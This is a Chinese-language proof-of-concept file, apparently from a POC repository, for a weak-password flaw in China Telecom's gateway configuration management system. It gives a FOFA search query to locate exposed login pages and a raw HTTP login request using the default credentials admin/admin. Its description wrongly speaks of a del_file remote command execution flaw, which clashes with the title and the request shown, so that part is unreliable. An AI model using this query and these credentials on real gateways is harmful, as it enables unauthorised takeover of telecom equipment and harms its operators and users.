POC/wpoc/电信网关配置管理系统/电信网关配置管理系统存在弱口令漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

37 lines
2.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 电信网关配置管理系统存在弱口令漏洞
**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">
</font><font style="color:rgba(0, 0, 0, 0.9);">中国电信集团有限公司英文名称“China Telecom”、简称“中国电信”成立于2000年9月是中国特大型国有通信企业、上海世博会全球合作伙伴。电信网关配置管理系统del_file存在远程命令执行漏洞攻击者可通过该漏洞获取服务器权限。</font><font style="color:rgb(38, 38, 38);">
</font>**<font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);">
</font><font style="color:rgb(38, 38, 38);">●电信网关配置管理系统
</font>**<font style="color:rgb(38, 38, 38);">三、资产测绘</font>**<font style="color:rgb(38, 38, 38);">
</font><font style="color:rgb(38, 38, 38);">●fofabody="src=\"img/dl.gif\"" && title="系统登录"
●特征</font>
![1713231679173-db9b0c3c-79d6-4f91-baac-a8358f5ccad1.png](./img/_B2JSQE8NXjKlV47/1713231679173-db9b0c3c-79d6-4f91-baac-a8358f5ccad1-665634.webp)
<font style="color:rgb(38, 38, 38);">
</font>**<font style="color:rgb(38, 38, 38);">四、漏洞复现</font>**
```yaml
POST /manager/login.php HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=tskslsm160gbfc5o8uskotr8i3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 21
Name=admin&Pass=admin
```
![1715327827741-bc58eb3d-2fa2-4e56-b04f-9bdd8dd8b59a.png](./img/_B2JSQE8NXjKlV47/1715327827741-bc58eb3d-2fa2-4e56-b04f-9bdd8dd8b59a-686922.png)
> 更新: 2024-05-14 11:22:11
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tskidd2bz9yqeir3>